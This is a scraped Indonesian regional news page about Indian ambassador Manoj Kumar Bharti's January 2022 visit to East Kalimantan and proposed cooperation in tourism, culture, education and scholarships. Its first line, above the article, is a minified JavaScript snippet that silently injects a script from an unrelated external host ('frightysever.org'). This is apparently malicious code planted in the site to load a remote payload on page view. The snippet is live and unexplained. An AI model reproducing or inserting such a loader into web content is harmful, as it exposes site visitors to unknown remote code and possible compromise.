(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Timur

Dubes India Manoj Kumar Bharti ke Kaltim, 3 Hubungan Diplomatik Diharapkan Benua Etam


KANALKALIMANTAN.COM, SAMARINDA – Kunjungan Duta Besar (Dubes) India untuk Indonesia HE Manoj Kumar Bharti ke Kaltim memberikan harapan kepada Bumi Mulawarman. Pemprov Kaltim sendiri berharap, adanya kerja sama lanjutan terhadap kunjungan yang dilakukan Manoj Kumar Bharti ke Benua Etam, Rabu (19/1/2022) kemarin.

“Alhamdulillah, Dubes India untuk Indonesia bersedia mengunjungi Kaltim. Kami senang dan bangga semoga Dubes betah berkunjung ke Kaltim,” kata Wakil Gubernur (Wagub) Kaltiim Hadi Mulyadi, melansir dari ANTARA, Kamis (20/1/2022).

Kedatangan Dubes India ke Kaltim diterima Wagub Kaltim Hadi Mulyadi yang sebelumnya tiba pada Minggu 16 Januari 2022 telah disambut oleh Kadis Pariwisata Kaltim Sri Wahyuni di VIP Room Bandara SAMS Sepinggan Balikpapan.

Orang nomor dua di Kaltim itu mengaku, senang bangga dengan kunjungan tersebut. Dubes India baru pertama kalinya ke Kaltim dan baru setahun berada di Indonesia.

 

Baca juga : Pelajar SMP di Banjarbaru Gantung Diri, Keluarga Sebut Sakit Hati Putus Cinta

Menurutnya, Dubes India dalam kunjungannya berkeinginan melanjutkan hubungan diplomatik mereka dengan Indonesia, termasuk Kaltim. Yaitu, hubungan kepariwisataan, kebudayaan dan pendidikan.

“Ada beberapa program yang ditawarkan Dubes, mulai kebudayaan, wisata dan pendidikan. Dia menawarkan investasi di Kaltim. Bahkan, menawarkan beasiswa India yang setiap tahun ada dengan kuota 100 untuk orang Indonesia,” jelas Hadi.

Meski demikian, walau singkat, ke depan diharapkan hubungan dengan Provinsi Kaltim dapat berkelanjutan. Bahkan, Dubes berkeinginan untuk datang kembali.

“Dubes India ingin datang kembali ke Kaltim untuk melanjutkan hubungan dengan pemerintah daerah yang lebih teknis lagi, termasuk investasi,” tandasnya.

 

Baca juga : Chef Agus Sasirangan: Harus Ada Kuliner Khas Kota Banjarbaru

Turut mendampingi Wagub Hadi, Kadis Pariwisata Sri Wahyuni, Karo Adpim Setdaprov Kaltim HM Syafranuddin, serta Kabid Perencanaan dan Pengembangan Iklim Penanaman Modal DPMPTSP Kaltim Hj Riawati. (Suara.com)

Editor : Suara


Desy Arfianty

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

3 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

4 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

15 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

15 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

15 jam ago

This website uses cookies.